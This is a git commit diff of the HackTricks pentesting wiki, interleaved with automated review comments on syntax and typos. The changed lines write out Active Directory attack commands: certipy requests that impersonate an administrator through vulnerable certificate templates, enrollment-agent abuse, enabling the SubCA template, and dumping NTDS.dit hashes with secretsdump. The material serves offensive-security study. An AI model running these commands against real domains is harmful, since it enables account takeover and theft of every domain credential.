Merge branch 'master' of github.com:carlospolop/hacktricks

This commit is contained in:
Carlos Polop 2024-01-13 23:03:52 +01:00
commit 32c705255a
3 changed files with 8 additions and 7 deletions


@ -213,6 +213,7 @@ Java.choose("com.example.a11x256.frida_test.my_activity" , {
## Other Frida tutorials
* [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs)
* [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
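Review bot: The added link title writes "IOS" where the platform name is "iOS"; since the URL slug already uses "ios", consider "Part 1 of Advanced Frida Usage blog series: iOS Encryption Libraries" so the list entry matches the rest of the page's naming.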


@ -41,14 +41,14 @@ To **find vulnerable certificate templates** you can run:
```bash
Certify.exe find /vulnerable
certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
certipy find -username john@corp.local -password Passw0rd -dc-ip 172.16.126.128
```
To **abuse this vulnerability to impersonate an administrator** one could run:
```bash
Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
```
Then you can transform the generated **certificate to `.pfx`** format and use it to **authenticate using Rubeus or certipy** again:
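Review bot: The new `certipy req` line drops the single quotes the old form had around the credential, so `-password Passw0rd!` is now unquoted; in an interactive bash session the trailing `!` triggers history expansion and the command fails before certipy runs, so quote it as `-password 'Passw0rd!'`. Also, `-target-ip` is being handed the hostname `ca.corp.local` rather than an address; either pass the CA's IP here or confirm in the certipy help that the flag resolves hostnames, otherwise readers copying the line will get a confusing error.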
@ -123,12 +123,12 @@ You can use [**Certify**](https://github.com/GhostPack/Certify) or [**Certipy**]
```bash
# Request an enrollment agent certificate
Certify.exe request /ca:CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA /template:Vuln-EnrollmentAgent
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'templateName'
certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local' -ca 'corp-CA' -template 'templateName'
# Enrollment agent certificate to issue a certificate request on behalf of
# another user to a template that allow for domain authentication
Certify.exe request /ca:CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA /template:User /onbehalfof:CORP\itadmin /enrollment:enrollmentcert.pfx /enrollcertpwd:asdf
certipy req 'corp.local/john:Pass0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
# Use Rubeus with the certificate to authenticate as the other user
Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
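Review bot: The rewritten enrollment-agent request line has an unbalanced single quote, `-target-ip ca.corp.local' -ca 'corp-CA'`, which shifts every following quote and leaves the shell waiting for input; drop the stray `'` after `ca.corp.local`. The same hunk also keeps two pre-existing slips worth fixing while touching these lines: the on-behalf-of request uses `Pass0rd!` where every other example uses `Passw0rd!` (and, as in the first hunk, the unquoted `!` needs quoting), and the context line `Rubeu.exe asktgt ...` should read `Rubeus.exe`.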
@ -323,7 +323,7 @@ The **`SubCA`** template can be **enabled on the CA** with the `-enable-template
```bash
# List templates
certipy ca 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -enable-template 'SubCA'
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
## If SubCA is not there, you need to enable it
# Enable SubCA
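Review bot: The `# List templates` comment sits directly above a `certipy ca ... -enable-template 'SubCA'` call, which enables the template rather than listing anything, so the comment now contradicts the command it annotates; either move the listing command here or change the comment to describe enabling `SubCA`. As in the other hunks, `-password Passw0rd!` lost its quoting in the rewrite and should be `-password 'Passw0rd!'` to survive bash history expansion.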


@ -156,7 +156,7 @@ For instance, you can directly access the Domain Controller file system:
You can abuse this access to **steal** the active directory database **`NTDS.dit`** to get all the **NTLM hashes** for all user and computer objects in the domain.
#### Using diskshadow.exe to dumo NTDS.dit
#### Using diskshadow.exe to dump NTDS.dit
Using [**diskshadow**](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) you can **create a shadow copy** of the **`C` drive** and in the `F` drive for example. The, you can steal the `NTDS.dit` file from this shadow copy as it won't be in use by the system:
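Review bot: The heading typo fix is correct, but the context line right after it carries two more slips in the same sentence: "The, you can steal" should be "Then, you can steal", and "create a shadow copy of the `C` drive and in the `F` drive" reads more clearly as "create a shadow copy of the `C` drive and expose it as the `F` drive", which matches the explanation that the copy is not in use by the system.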
@ -204,7 +204,7 @@ Finally you can **get all the hashes** from the **`NTDS.dit`**:
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```
#### Using wbadmin.exe to dumo NTDS.dit
#### Using wbadmin.exe to dump NTDS.dit
Using wbadmin.exe is very similar to diskshadow.exe, the wbadmin.exe utility is a command line utility built into Windows, since Windows Vista/Server 2008.
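Review bot: The context line below the corrected heading is a comma splice; "Using wbadmin.exe is very similar to diskshadow.exe, the wbadmin.exe utility is a command line utility built into Windows, since Windows Vista/Server 2008" reads better split as "Using wbadmin.exe is very similar to diskshadow.exe. wbadmin.exe is a command-line utility built into Windows since Windows Vista/Server 2008."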